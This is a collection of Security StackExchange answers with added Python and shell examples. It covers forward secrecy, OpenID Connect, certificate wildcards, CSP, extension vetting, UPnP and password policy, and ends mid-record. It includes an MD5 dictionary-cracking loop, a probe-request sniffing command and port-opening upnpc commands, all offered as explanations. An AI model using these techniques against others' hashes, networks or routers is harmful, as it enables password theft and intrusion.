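To see where the "ephemeral" part does its work, here is a bare ECDH exchange in Python with the cryptography package (X25519 rather than the classic finite-field DH groups discussed above, but the principle is the same):

from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey

# Each side generates a throwaway key pair for this one session.
client_eph = X25519PrivateKey.generate()
server_eph = X25519PrivateKey.generate()

# Only the public halves cross the wire; both sides compute the same secret.
client_secret = client_eph.exchange(server_eph.public_key())
server_secret = server_eph.exchange(client_eph.public_key())
assert client_secret == server_secret

# Forward secrecy comes from discarding the private halves: once they are
# gone, even a later theft of the server's long-term signing key cannot
# recover this session's traffic from a recorded transcript.
del client_eph, server_eph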
37,818 | I just started to use OAuth 2.0 as a way to authenticate my users. It works great - I just use the identity/profile API of each provider to get a validated email address of the user. Now I read about OpenID Connect and am a little bit confused. What is the difference between OpenID Connect and using the identity API over OAuth2? Is it just that I have a standard profile API, so that I don't have to worry whether I get an "email" or an "emails" JSON back? Or is there more to it, which makes the OpenID Connect approach more secure than my first approach? | OpenID connect will give you an access token plus an id token .
The id token is a JWT and contains information about the authenticated user. It is signed by the identity provider and can be read and verified without accessing the identity provider. In addition, OpenID Connect standardizes quite a few things that OAuth2 leaves up to choice: for instance scopes, endpoint discovery, and dynamic registration of clients. This makes it easier to write code that lets the user choose between multiple identity providers. | {
"source": [
"https://security.stackexchange.com/questions/37818",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/5203/"
]
} |
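To get a feel for what the id token carries, here is a small Python helper that splits a JWT and decodes its header and claims. This is inspection only; a real client must verify the signature against the provider's published keys (for example with a JOSE library) before trusting any claim:

import base64
import json

def peek_id_token(id_token):
    # A JWT is three base64url-encoded parts: header.payload.signature
    def decode_part(part):
        part += "=" * (-len(part) % 4)       # restore stripped padding
        return json.loads(base64.urlsafe_b64decode(part))

    header_b64, payload_b64, _signature = id_token.split(".")
    return decode_part(header_b64), decode_part(payload_b64)

# A typical payload holds claims such as iss (issuer), sub (stable user id),
# aud (your client id), exp, and profile claims like email, so no extra call
# to a provider-specific "identity API" is needed just to identify the user.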
37,887 | As far as I can tell, an SSL certificate for *.example.com is good for foo.example.com and bar.example.com , but not foo.bar.example.com . Wildcards certificates cannot have *.*.example.com as their subject. I guess this is due to the fact that certificates like example.* aren't allowed -- allowing characters before the wildcard can lead to a malicious user matching their certificate with the wrong domain. However, I don't see any problem with allowing certificates of the *.example.com variety to apply to all subdomains, including sub-subdomains to an infinite depth. I don't see any use case where the subdomains of a site are "trusted" but the sub-subdomains are not. This probably causes many problems. As far as I can tell, there's no way to cleanly get certificates for all sub-subdomains; you either become a CA, or you buy certificates for each subdomain. What's the reasoning, if any, behind restricting *.example.com to single-depth subdomains only? Bonus question: Similarly, is there a reason behind the blanket ban on characters before a wildcard? After all, if you allow only dots and asterisks before a wildcard, there's no way that the site from a different domain can be spoofed. | Technically, usage of wildcards is defined in RFC 2818 , which does allow names like " *.*.example.com " or " foo.*.bar.*.example.com " or even " *.*.* ". However, between theory and practice, there can be, let's say, practical differences (theory and practice match perfectly only in theory, not in practice). Web browsers have implemented stricter rules, because: Implementing multi-level wildcard matching takes a good five minutes more than implementing matching of names with a single wildcard. Browser vendors did not trust existing CA for never issuing an " *.*.com " certificate. Developers are human beings, thus very good at not seeing what they cannot imagine, so multi-wildcard names were not implemented by people who did not realize that they were possible. So Web browsers will apply restrictions, which RFC 6125 tries to at least document. Most RFC are pragmatist: if reality does not match specification, amend the specification, not reality. Note that browsers will also enforce extra rules, like forbidding " *.co.uk " (not all browsers use the same rules, though, and they are not documented either). Professional CA also enter the dance with their own constraints, such as identity checking tests before issuing certificates, or simply unwillingness to issue too broad wildcard certificates: the core business of a professional CA is to sell many certificates, and wildcard certificates don't help for that. Quite the opposite, in fact. People want to buy wildcard certificates precisely to avoid buying many individual certificates. Another theory which failed to make it into practice is Name Constraints . With this X.509 extension, it would be possible for a CA to issue a certificate to a sub-CA, restricting that sub-CA so that it may issue server certificates only in a given domain tree. A Name Constraints extension with an "explicit subtree" of value " .example.com " would allow www.example.com and foo.bar.example.com . In that model, the owner of the example.com domain would run his own CA, restricted by its über-CA to only names in the example.com subtree. That would be fine and dandy. Unfortunately, anything you do with X.509 certificates is completely worthless if deployed implementations (i.e. Web browsers) don't support it, and existing browsers don't support name constraints. 
They don't, because there is no certificate with name constraints to process (so that would be useless code), and there is no such certificate because Web browsers would not be able to process them anyway. To bootstrap things, someone must start the cycle, but browser vendors wait after professional CA, and professional CA are unwilling to support name constraints, for the same reasons as previously (which all come down to money, in the long run). | {
"source": [
"https://security.stackexchange.com/questions/37887",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7497/"
]
} |
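The single-level rule that browsers actually enforce is easy to express. A simplified Python version follows; real implementations add further checks, such as refusing wildcards on public suffixes like *.co.uk:

def matches_wildcard(pattern, hostname):
    # RFC 6125-style matching: '*' is only honoured as the entire left-most
    # label and never spans a dot.
    p_labels = pattern.lower().split(".")
    h_labels = hostname.lower().split(".")
    if len(p_labels) != len(h_labels):
        return False
    if p_labels[0] != "*":
        return p_labels == h_labels
    return p_labels[1:] == h_labels[1:]

assert matches_wildcard("*.example.com", "foo.example.com")
assert not matches_wildcard("*.example.com", "foo.bar.example.com")   # two levels deep
assert not matches_wildcard("*.example.com", "example.com")           # bare domain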
37,927 | Is it possible for a (malicious) (hardware) USB device to access all the data that is transferred through the USB bus and then read/store this information, essentially sniffing all transferred data? Or is the USB bus switched and only sends data to the correct recipient, i.e. only allowing the intended recipient to read it? | Most likely yes, but it depends Much like PATA, SCSI, and Ethernet devices, USB devices don't directly connect to the computer. They connect to a Host Controller that manages all signaling and communication. All ports are connected to something called a Root Hub, and to each Root Hub you may connect other hubs and subsequently more hubs. Each of these hubs have multiple downstreams and exactly one upstream. "What does that mean?" you ask. Well, it means that whatever data sent by the hub is sent to all child hubs and devices, while data sent by the hubs and devices are only sent "upwards" to Root Hub. So, if a number of devices are connected to ports that lead to the same Root Hub (they're all controlled by the same Host Controller), then any of the devices can sniff the data only in the direction Computer -> Device. In my laptop, for example, the ports on the right side are controlled by a Host Controller, and the ports on the left side are controlled by another Host Controller. Meaning that data sent to any device on the right side can be sniffed by any device on the right side, but not devices connected to the left side. I remember a colleague of mine modifying a USB stick to prevent it from ignoring data sent to other devices. So if you plug that modified USB stick to a computer, you can capture all the files copied to other USB sticks on the same computer. Update: @Polynomial's comment made me question the whole answer, since my information is based on my colleague's description. To be sure, I tried to find some reference. I dug in the USB specs and I found this: ...
In the downstream direction, hubs operate in a broadcast mode. When a
hub detects the start of a packet on its upstream facing port, it
establishes connectivity to all enabled downstream facing ports. If a
port is not enabled, it does not propagate packet signaling downstream. Also, a TOTAL PHASE KB article seems to agree: USB 2.0 works through a unidirectional broadcast system. When a host
sends a packet, all downstream devices will see that traffic. If the
host wishes to communicate with a specific device, it must include the
address of the device in the token packet. Upstream traffic (the
response from devices) are only seen by the host or hubs that are
directly on the return path to the host. | {
"source": [
"https://security.stackexchange.com/questions/37927",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/12675/"
]
} |
38,001 | How can Content Security Policy (CSP) significantly reduce the risk and impact of XSS attacks in modern browsers? Is it possible to circumvent CSP in order to execute XSS? | Yes, CSP goes a long way to defending against XSS. If you do a Google search on "Content Security Policy XSS" the first few links explain how and why. If you're having trouble using Google, here are some good links to help explain how CSP defends against XSS: An Introduction to Content Security Policy from Mike West An Introduction to Content Security Policy from David Müller Using Content Security Policy to Prevent Cross-Site Scripting (XSS) - SendSafely.com explains how they use CSP on their site. The promises of Content Security Policy to secure the web The CSP policy is enforced by the browser. Therefore, assuming you have set a proper CSP policy, and assuming your browser doesn't have bugs, there is no way to bypass CSP. That's one of the attractions of CSP. Note that some browsers (e.g., IE10 and earlier versions of IE, if I recall correctly) don't support CSP. Be warned that CSP is not a silver bullet: CSP does not stop DOM-based XSS (also known as client-side XSS) if you enable 'unsafe-eval' in your CSP policy. To prevent DOM-based XSS, you must write your Javascript carefully to avoid introducing such vulnerabilities. CSP stops most forms of script injection, but it does not stop markup injection: see, e.g., Postcards from the post-XSS world as well as the HTML form injection attack from Section III-A of Self-Exfiltration: The Dangers of Browser-Enforced Information Flow Control (Chen et al, W2SP 2012). So, you still will want to avoid introducing injection bugs into your code. See also A few things beyond the scope of Content Security Policy for more discussion of some problems that CSP doesn't solve. | {
"source": [
"https://security.stackexchange.com/questions/38001",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/11801/"
]
} |
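Since CSP is delivered as an ordinary response header that the browser enforces, adding it to an application is straightforward. A sketch using Flask; the framework choice and the directive list are illustrative and must be adapted to wherever a site really loads its resources from:

from flask import Flask

app = Flask(__name__)

# No inline script, no eval, and resources only from our own origin.
CSP_POLICY = ("default-src 'none'; script-src 'self'; style-src 'self'; "
              "img-src 'self'; connect-src 'self'; frame-ancestors 'none'")

@app.after_request
def add_csp_header(response):
    response.headers["Content-Security-Policy"] = CSP_POLICY
    return response

Because this policy forbids inline script and external script origins, a reflected or stored <script> payload simply never executes, which is the property that blunts most XSS.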
38,033 | Almost any browser addon/extension that I install on my Chrome or Firefox (be it Firebug, RESTClient, ...) warns me, saying: It [the add-on] can: Access your data on all website Access your tabs and browsing activity Now, practically speaking, I have no time (or the skill) to read through their source-code and verify absence of malware (such as one placed in by its original author). Given this, can I safely assume these add-ons won't violate my privacy because they are coming from standard/well-known and thus implicitly trusted places, such as the Chrome Web Store , the Firefox add-on site , Opera's add-on site , Safari's extension gallery , or the EFF site . Even an add-on like HTTPS Everywhere , which you install to maintain privacy and prevent MiTM attacks, warns similarly. Is there any way to quickly tell what add-on to install and what not to, without having to read their source code? | You cannot assume that an add-on is safe "because it's hosted in one of the official extension galleries". In this answer, I start with the explanation of how extensions end up in the extension galleries for the popular browsers. At the end, I dedicate an extra section to Chrome. How does an item get listed in the official stores? Anyone with Google Wallet can pay 5$ to upload up to 20 extensions/apps to the Chrome Web Store . Extensions with binary components ( NPAPI ) are always reviewed manually. Other extensions are only checked by Google's secret scanner , which may put an extension on hold ( "Pending review" ) if needed. This scanner is not perfect: Two months ago, I found many malicious extensions that violate the Developer Program policies . (I've filed some Report abuse forms; some apps were taken down, others weren't even though they contained the same kind of adware). All Firefox add-ons on AMO are put in a review queue upon submission. All editors who review add-ons have to follow the guidelines as stated in Performing a review . Extension developers are supposed to follow these instructions . Safari extensions can be submitted to the Apple Extension gallery . Developers have to adhere to the requirements of this document pdf . After passing the review, the extension will be listed in the gallery. Apple does not host the extension files themselves. After passing review, the extension will receive a prominent location in the relatively quiet extension gallery. Upon click, the extension from an external location is immediately installed without confirmation. As of Safari 9 , extensions can choose to host the extension data in the extension gallery if they wish. All extensions in Opera's extension gallery are manually reviewed. Extensions will only be listed if they pass review ( acceptance criteria ). Extensions and add-ons on IEGallery.com are manually reviewed. The review criteria are very vague though. Further, IE extensions are compiled code, so the reviewers can't even know for sure that the add-on is safe. Auto-updating All of these four galleries support automatic updates of extensions. Unless stated otherwise, the updates will automatically be installed (unless turned off by the user). Updates to Chrome extensions are automatically checked, sometimes followed by a manual review. When an extension requests more permissions, they're automatically disabled until a user confirms the new requirements. The developer documentation provides list of permission warnings and their meanings . 
Google has also created a page (with fewer details) to explain the warnings to users - see Permissions requested by apps and extensions . Updates to Firefox add-ons are manually reviewed. Updates to Opera extensions are manually reviewed. Opera abandoned their old extension ecosystem and switched to a Chromium-like extension API in Opera 15. Before Opera 15 (Opera 12.xx and earlier), updates were automatically installed. Starting from Opera 15, extensions are disabled when a new permission is added, just like Chromium (see this comment on Github ). Safari extensions hosted in the extension gallery itself are probably checked by Apple 1 , (updates to) Safari extensions hosted elsewhere are not. As of Safari 9, extensions can only be auto-updated if they are hosted in Apple's extension gallery. Internet Explorer extensions are not automatically updated, unless the developer has built this feature. External code Reviews are useless if vendors allow the use of external JavaScript code. So, which galleries allows the use of external code? Chrome extensions may contain external code. Firefox and Opera forbids the use of external JavaScript code in add-ons. Safari extensions are hosted on servers not controlled by Apple, so the developer is free to include whatever they want. Internet Explorer extensions are generally closed-source compiled binaries, so developers can run whatever code they want. Privacy Many extensions collect usage statistics without the user's consent. Chrome even offers a tutorial on setting up tracking in extensions ... Chrome Firefox and Opera are doing quite well with the security of their extension platform. I don't put as much trust in the Chrome web store, because it does not manually review all extensions. The only way to be sure that an extension is safe is to review it yourself.
For this purpose, I've created the "Chrome extension source viewer" Chrome extension . This extension allows one to view the source code of an extension in the Chrome Web Store. It ships with a code beautifier to make it more readable. The first place to look at it a file called manifest.json , because it defines the capabilities of an extension. Do you see anything suspicious? For instance, does an extension which promises to add smileys to Facebook define a content script for *://*/* (= match pattern for every page)? Don't install the extension. Look at the list of files. Do you see a file called analytics.js ? Know that you're going be tracked. This is not necessarily wrong, but it's good to know. Look in the files for _gaq.push , which is the standard way to use Google Analytics. Final note: Do not blindly trust an extension because it has a high number of users. Look through recent reviews and look for any red flags. Ignore the usual trolling comments and "1 star - does not work!" (unless there are heaps of them), and focus on comments that raise concerns about privacy or security. 1. Apple likely performs these checks, but it is unconfirmed. | {
"source": [
"https://security.stackexchange.com/questions/38033",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/9375/"
]
} |
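If you do extract an extension for review, a first pass over manifest.json can be automated along the lines of the manual checks described above. A small Python helper; the host patterns and permission names below are an illustrative selection, not an official "dangerous" list:

import json

BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
SENSITIVE_PERMISSIONS = {"tabs", "webRequest", "history", "cookies", "management"}

def review_manifest(path):
    manifest = json.load(open(path, encoding="utf-8"))
    injected_everywhere = [m
                           for script in manifest.get("content_scripts", [])
                           for m in script.get("matches", [])
                           if m in BROAD_HOSTS]
    risky = SENSITIVE_PERMISSIONS & set(manifest.get("permissions", []))
    return {"content scripts on every page": injected_everywhere,
            "sensitive permissions": sorted(risky)}

# A "smiley" extension whose manifest injects into *://*/* and asks for
# webRequest deserves a much closer read of its JavaScript.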
38,141 | I have read several times that hashing is a one-way function: that is, you can compute the hash of a message, but you can't recover the original message from the hash, only check its integrity. However, if this were true, why can we "decrypt" MD5 hashes and get the original data? | Hashing is not encryption (it is hashing), so we do not "decrypt" MD5 hashes, since they were not "encrypted" in the first place. Hashing is one-way, but deterministic: hash the same value twice, and you get the same output twice. So cracking an MD5 hash is about trying potential inputs (passwords) until a match is found. It works well when the input is "a password which a human user came up with" because human users are awfully unimaginative when it comes to choosing passwords. | {
"source": [
"https://security.stackexchange.com/questions/38141",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/15194/"
]
} |
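This guess-and-compare loop is all that the online "MD5 decryption" services do, just with enormous precomputed wordlists or rainbow tables. A minimal Python version:

import hashlib

target = "5f4dcc3b5aa765d61d8327deb882cf99"      # md5("password")
wordlist = ["123456", "letmein", "qwerty", "password", "dragon"]

for guess in wordlist:
    if hashlib.md5(guess.encode()).hexdigest() == target:
        print("recovered input:", guess)   # hashing is deterministic, so a
        break                              # matching guess reveals the input
else:
    print("not in wordlist; nothing to 'decrypt'")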
38,206 | I'm setting up a node.js server: https.createServer({
...
ciphers: 'ECDHE-RSA-AES128-SHA256:AES128-GCM-SHA256:RC4:HIGH:!MD5:!aNULL:!EDH',
honorCipherOrder: true
}, app).listen(443); This is a able to achieve a SSLLabs A rating, which is good. Now, it appears that all of the negotiations in the handshake simulation are performed using TLS_RSA_WITH_RC4_128_SHA . RC4 is resilient against BEAST. If we are vulnerable to BEAST we cannot get an A rating. I would like to support PFS (forward secrecy) if supported by the client. Based on my reading I "must generate some randomness" by generating Diffie-Hellman parameters and get that into my certs somehow, before the server will properly implement ECDHE for forward secrecy. I read somewhere that ECDHE is less CPU-intensive than DHE, so that is a plus. Well, I have a lot of questions. But I will ask the first one: Why must I generate "some randomness" to append to the certificates, what purpose does it serve, and what does the command actually do? The OpenSSL page on dhparam doesn't tell me a lot about what it actually does. I have seen this answer and am looking for a more clear explanation (or at least references to relevant reading!). According to OpenSSL Ciphers it looks like ECDHE is a TLS 1.2 cipher. On Qualys' PFS page it says that ECDHE is supported by all major modern browsers, and yet I only see iOS6 in the results from my SSLLabs test connecting via TLS1.2. I guess I can take the "handshake simulation" section with a grain of salt. Another question is why SSLLabs rates with an A if I leave the HIGH entry in the cipher list: This would have the server support a connection e.g. TLS_RSA_WITH_AES_128_CBC_SHA (the report indicates as much), which is vulnerable to BEAST! Perhaps because it never tested with a "client" that reports no RC4 support. One more question: On the OpenSSL Ciphers page the list under TLS 1.2 cipher suites includes: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 ECDHE-RSA-AES128-SHA256 Does this indicate that if I do get it connecting with ECDHE that is now vulnerable to BEAST as well due to the use of CBC? E.g. I should switch this to do as Google does: ECDHE with RC4. But the Ciphers page does not include anything that looks like ECDHE-RSA-RC4-SHA. There is however a ECDHE-ECDSA-RC4-SHA. How is this different? Edit: this SO answer mentions that ECDSA is something separate from RSA. I'd like to replicate what Google's doing with the ECDHE_RSA+RC4+SHA as that seems like the perfect blend of performance and security. More notes (please tell me if I have misunderstood things, especially the statements disguised as questions): BEAST resilience is controlled through the selection of the symmetric cipher (RC4 vs AES, etc). Modes of AES not using CBC are not supported by many clients? So we should just avoid AES altogether...? PFS is may be obtained through the use of Diffie-Hellman key exchange, and only the modes that include either DHE or ECDHE satisfy this. Only OpenSSL supports perfect forward secrecy. RC4 is faster than AES. RC4 is better than AES (because of BEAST)? Another edit: Let's see... here is an indication that BEAST isn't something to be too realistically concerned about, though it negatively affects SSLLabs rating. That big "A" looks so good... Let's see... I should probably still put the RC4_128 ciphers in the beginning of the cipher chain if for no other reason that they have not been shown to be "broken", and are faster than AES generally. Anyway I've strayed far away from the original topic which is ECDHE. And how to get the DH parameters properly working with Node/Express? 
| The traditional RSA-based exchange in SSL is nice in that a random session key is generated and transmitted using asymmetric encryption, so only the owner of the private key can read it. This means that the conversation cannot be decrypted by anyone unless they have the certificate's private key. But if a third party saves the encrypted traffic and eventually acquires the private key, he can use that to decrypt the session key from the SSL exchange, and then use that to decrypt the whole session. So that's not perfect forward secrecy. The key here to Perfect Forward Secrecy is the Diffie-Hellman key exchange . DH is a very cool algorithm for generating a shared key between two parties such that an observer who sees everything -- the whole exchange between the two parties in the clear -- cannot derive the key just from what is sent over the wire. The derived secret key is used one time, never stored, never transmitted, and can never be derived ever again by anyone. In other words, perfect forward secrecy. DH alone can't protect you because it's trivial to play man-in-the-middle as there's no identity and no authentication. So you can continue to use RSA for the authentication and just use Diffie-Hellman to generate the session key. That's DHE-RSA-* , so for example: DHE-RSA-AES128-SHA1 is a cipher spec that uses Diffie-Hellman to generate the key, RSA for authentication, AES-128 for encryption, and SHA1 for digests. But Diffie-Hellman requires some set-up parameters to begin with. These aren't secret and can be reused; plus they take several seconds to generate. But they should be "clean", generated by you so you know they're not provided by an attacker. The dhparam step generates the DH params (mostly just a single large prime number) ahead of time, which you then store for the server to use. A recent bit of research showed that while "breaking" a DH exchange (that is, deriving the key from the traffic) is difficult, a fair amount of that difficult work can be done ahead of time simply based on the primes. This means that if the same DH primes are used everywhere, those become a "prime" target for well-funded agencies to run their calculations against. This suggests that there is some amount of increased safety to be had in generating your own primes (rather than relying on those that come with your software), and perhaps in re-generating those primes periodically. An interesting bit is that Elliptic curve Diffie-Hellman is a modified Diffie-Hellman exchange which uses elliptic curve cryptography instead of the traditional RSA-style large primes. So while I'm not sure what parameters it may need (if any), I don't think it needs the kind you're generating. See also: What is ECDHE-RSA? SSL/TLS & Perfect Forward Secrecy With respect to BEAST: The BEAST attack relies on some artifacts of the block chaining method used with AES on older versions of SSL. Newer versions of SSL do things right, so no worries there. RC4 is not a block cipher, so there is no block chaining. The BEAST attack is so absurdly difficult to pull off that its real-world implications are decidedly nonexistent. In fact, RC4 has some weaknesses of its own, especially when abused the way the BEAST attack would have to do. So you may not actually be getting any better security. Certainly forcing TLS 1.2 would solve all your theoretical security problems, while at the same time preventing many visitors from actually connecting. Not entirely unlike using ECDHE. | {
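If you want to try the dhparam step yourself, the commands below are a minimal sketch; the output file name is a placeholder, and how (or whether) the result can be handed to your particular Node/OpenSSL stack depends on the versions you are running:
# Generate classic Diffie-Hellman parameters: one large prime, slow to
# create, not secret, safe to store on disk and reuse (or regenerate
# periodically if you are worried about widely shared primes):
openssl dhparam -out dhparams.pem 2048
# ECDHE does not need a dhparam file at all; you only choose a named
# curve from those your OpenSSL build supports:
openssl ecparam -list_curves
Doing the generation once at deployment time keeps the multi-second cost out of the connection path.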
"source": [
"https://security.stackexchange.com/questions/38206",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/9786/"
]
} |
38,365 | According to something I spotted in a set of directions for connecting to a hidden wireless network from Windows 8 found here (located under Step 1 > "Troubleshoot connection problems" > "How do I connect to a hidden wireless network?"): A hidden wireless network is a wireless network that isn't broadcasting its network ID (SSID). Typically, wireless networks broadcast their name, and your PC “listens” for the name of the network that it wants to connect to. Because a hidden network doesn’t broadcast, your PC can't find it, so the network has to find your PC. For this to happen, your PC must broadcast both the name of the network it's looking for and its own name. In this situation, other PCs “listening” for networks will know the name of your PC as well as the network you’re connected to, which increases the risk of your PC being attacked. (emphasis added) I had always believed that hidden wireless networks were actually safer than normal ones, because only those who already know of the network are able to connect to it, so an attacker wouldn't be able to connect to it to listen to your traffic. Are hidden networks actually more risky, as the paragraph says, and if so, what measures can be taken to help mitigate the risk? Also, I know that there are some countries where publicly broadcasting home networks are actually illegal, and hidden networks are the only option for wireless. If broadcasting networks are safer, why are they illegal in some places? | The risk here is in believing that a "hidden SSID" changes anything about the security. A non-hidden SSID means that the router will shout at regular intervals "hello everybody, I am Joe the Router, you may talk to me !". A hidden SSID means that the client machine (not the attacker's machine) will shout at regular intervals "Hey, Joe, where are you ? Please respond !". Either way, assuming that the SSID (here, "Joe") is not known to any attacker would be overly naive. A point that could be made is that when the SSID is hidden, then an attacker may assume that the SSID is valuable in some way; so, when your PC connects, your PC shows that it knows the valuable SSID, and thus is also a valuable target in some sense. Not that it would change things much in practice: attackers will attack everything in range anyway, as a matter of principle. | {
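If you want to observe this behaviour on your own network, a wireless card in monitor mode will show the probe requests that clients send while looking for a "hidden" network; the interface name is a placeholder and the capture-filter syntax may differ between tcpdump builds:
# With the card already in monitor mode, print 802.11 management frames
# of the probe-request type -- clients calling the hidden SSID by name:
tcpdump -i wlan0mon -e -s0 type mgt subtype probe-req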
"source": [
"https://security.stackexchange.com/questions/38365",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/16726/"
]
} |
38,460 | Is it possible to protect my site from HTTrack Website Copier or any similar program, without setting a maximum number of HTTP requests from users? | No, there's no way to do it. Without setting connection parameter limits, there isn't even a way to make it relatively difficult. If a legitimate user can access your website, they can copy its contents, and if they can do it normally with a browser, then they can script it. You might set up User-Agent restrictions, cookie validation, maximum connections, and many other techniques, but none will stop somebody determined to copy your website. | {
"source": [
"https://security.stackexchange.com/questions/38460",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/26356/"
]
} |
38,589 | I have noticed that an HTTPS connection can be set up with the server configured to use a certificate, and when additional security is required, the server can ask the client to provide a client certificate, validate it, and set up the connection. It seems that, if we ask all clients to provide their certificates, which contain public keys and corresponding signatures, the secure connection should also be able to be established. The server just validates the signatures, then encrypts the data being sent using the client's public key. If knowledge of the identity of clients is more important than that of the server, the server certificate is of no use here. So is it supported in the HTTPS protocol that the server provides no certificate but asks for client certificates, and then establishes the HTTPS connection? | HTTPS is HTTP-within-SSL. SSL is a tunnel protocol: it works over an existing bidirectional stream for data, and provides a bidirectional stream for data. The two parties involved in SSL are the client and the server, which are two roles within the SSL protocol; it is not required that these roles map to the notions of "client" and "server" of the underlying transport protocol. For instance, a setup can be imagined, in which the client system (C) initiates a TCP connection to the server (S), and then the server initiates a SSL handshake, acting as the SSL client (i.e. sending the ClientHello message, instead of waiting for an incoming ClientHello ). This reverses the roles of both machines, and also the security guarantees: the machine S will have a good idea of the identity of the connected client C, but the client C will not be sure of what server S it is talking to (an attacker could have intercepted and redirected the communication). Depending on the context, this may or may not be appropriate. However, this departs from HTTPS , in which the TCP client is also the SSL client, and that client expects the server to show a certificate, which the client will validate against its known, trusted CA, and which contains the expected server name (as extracted from the URL, see section 3.1 ). Correspondingly, existing clients (Web browsers) do not support reversal of SSL roles. If your situation calls for using browsers, then you must, of course, use only the functionality available in browsers. SSL does support a few certificate-less cipher suites. The "DH_anon" cipher suites are deemed weak, because they imply no authentication at all (thus, Man-in-the-Middle attacks are possible). The PSK cipher suites imply mutual authentication of both client and server with regards to a shared secret. When the shared secret is of low entropy (say, it is a password ), SRP cipher suites are better. There again, these cipher suites are not (yet) available in mainstream browsers (although some people are working on it ). They require a shared secret (key or password), a condition which may or may not be easy to achieve in your specific context. If knowledge of the server identity is unimportant, then you can give the server a self-signed certificate, along with instructions for clients on how to make their browser accept the server certificate without cringing too loudly (see this question as a starting point). This will map to "normal SSL", which has two benefits: Existing browsers support that. When the server presents a certificate, however bogus, it is then allowed to ask, in return, for a client certificate, yielding the kind of authentication that you are looking for.
And Web browsers do support client certificates for SSL. Note that the self-signed certificate contains the server public key. Though this public key won't be validated, it will still be used to power the key exchange, so you must use an appropriate key type and length (say, RSA 2048). Alternatively, use one of the "DHE" cipher suites, in which case the server public key is used only for signatures, not to actually protect the data, so (in your specific case) its size and secrecy become unimportant. | {
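To experiment with client-certificate authentication outside of a browser, the OpenSSL command-line tools can play both sides; the file names and port below are placeholders:
# Test server that presents a (possibly self-signed) certificate and
# requires the client to present one of its own (-Verify makes it mandatory):
openssl s_server -accept 8443 -cert server.pem -key server.key -CAfile client-ca.pem -Verify 1
# Client connecting and presenting its certificate:
openssl s_client -connect localhost:8443 -cert client.pem -key client.key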
"source": [
"https://security.stackexchange.com/questions/38589",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/11305/"
]
} |
38,629 | Let's assume that a legitimate torrent file has been safely and successfully downloaded over HTTPS, and perhaps even OpenPGP verification was used to verify the integrity of the torrent file. How good are torrent clients against attackers who want to add malicious content to the download? Do torrent clients only catch disruption due to network failure, or any kind of attack? Do torrent clients only use SHA-1, or a stronger hash algorithm where fewer people argue about whether it's still secure, such as SHA-256? (I am NOT asking about any privacy/piracy/legal aspects here.) | BitTorrent uses a method called Chunking, in which files are divided into 64 KB – 2 MB pieces. Each piece is hashed and the hashes (along with the piece size) are stored in the torrent's metadata (the small .torrent file, or the metadata you receive via DHT ). That, along with the info_hash , makes BitTorrent quite resistant to intentional tampering (poisoning). SHA-1 is used in the info_hash and to verify the chunks. The University of Southern California has made a study on the subject: We discover that BitTorrent is most resistant to content poisoning. ... Because the index file is distributed outside of the P2P file-sharing
system, each chunk can be verified with a reliable hash contained in
the metadata. This verification provides BitTorrent protocol with high
resistance to content poisoning. | {
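As a rough illustration of per-piece verification (not a real .torrent parser; the piece size and file name are arbitrary), you can reproduce the hashing step by hand:
# Cut a file into 256 KiB pieces and hash each one; a client compares such
# hashes with those stored in the torrent metadata and discards any piece
# that does not match, then re-requests it from another peer:
split -b 262144 some-download.iso piece_
sha1sum piece_*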
"source": [
"https://security.stackexchange.com/questions/38629",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/25557/"
]
} |
38,631 | I found port forwarding entries in my home router that I haven't manually configured. Is that because of UPnP? Are applications simply able to tell the router to forward ports on their own? Are there any security implications with enabling UPnP? | Many modern home routers come with a feature called Universal Plug and Play (UPnP) to allow NAT traversal using the IGD Protocol . What that means is that an application can ask the router "Hey, could you please let external computers speak to me on port xxxx", and the router then creates a port map for the requested port. UPnP has a variety of security problems, the main one being that it doesn't have any built-in authentication. One example is a PoC by Petko D. Petkov where he demonstrated how Flash can be used to send UPnP commands to a local router when visiting a malicious page. UPnP also makes it much easier for malware on your computer to open ports and listen for commands from a C&C Server . Despite not being around for a long time, UPnP has a long list of security issues, mainly due to poor implementations. Researchers at Rapid7 have shown that nearly 81 million IP addresses have responded to their UPnP requests (mind you, those requests are coming from external networks), and many of these devices had vulnerabilities that can lead to complete takeover. So my advice is this: if you want port forwarding, you probably want it for a specific program, so disable UPnP and map the ports yourself. It's not something you'll be doing every day. | {
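If you want to audit what UPnP has already opened on your own router, the miniupnpc command-line client (if your distribution ships it) can query the IGD; the addresses and ports below are just examples:
# List the port mappings the router currently exposes via UPnP/IGD:
upnpc -l
# For comparison, adding a mapping is a one-liner, which is exactly why
# leaving UPnP enabled is risky:
upnpc -a 192.168.1.50 22 2222 TCP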
"source": [
"https://security.stackexchange.com/questions/38631",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/28073/"
]
} |
38,691 | Is there a security reason to disallow a user to change their password as frequently as they want? I have found this security policy in a site and I am not sure why it is enforcing it. One reason I can imagine is that the change password functionality is a 'costly procedure', and changing it multiple times in a row can provoke a DoS on the site or produce too much traffic in the mail server that sends an email each time a password is changed. Any other reason? Note: I have found a similar question here: Is there any conceivable reason to prevent a password change in an authentication system? | The real reason why such policies are in place is because they are in place by default . That's how things go in Active Directory: Passwords expire after 42 days. When changing his password, the (non-admin) user cannot reuse one of his 24 previous passwords. User cannot change his password twice within the same 24-hour frame. So you will encounter such things a lot, mostly because it would require efforts and understanding to set them otherwise. Most people go through their life in a state of blissful ignorance and laziness, and sysadmins are no exception. When a rationale for the third property (24 hours between password changes) is needed, the oft-cited reason is what @bobince says: to prevent a snarky user from cycling through 23 dummy passwords to get back at his initial password, because that would contradict the first rule (no password reuse). Of course, such rules won't prevent users from using "sequence passwords": Password37, Password38, Password39... which somehow defeats the purpose of forcing password expiry (purpose which is already of very dubious value). And preventing the user from changing his password as often as he wants also means that the user cannot change his password as often as he needs : if the user notices a shoulder surfer who just stole his password, a security aware user would like to quickly change his own password, which would be, in that case, a very good idea. The rule against password change may prevent that. | {
"source": [
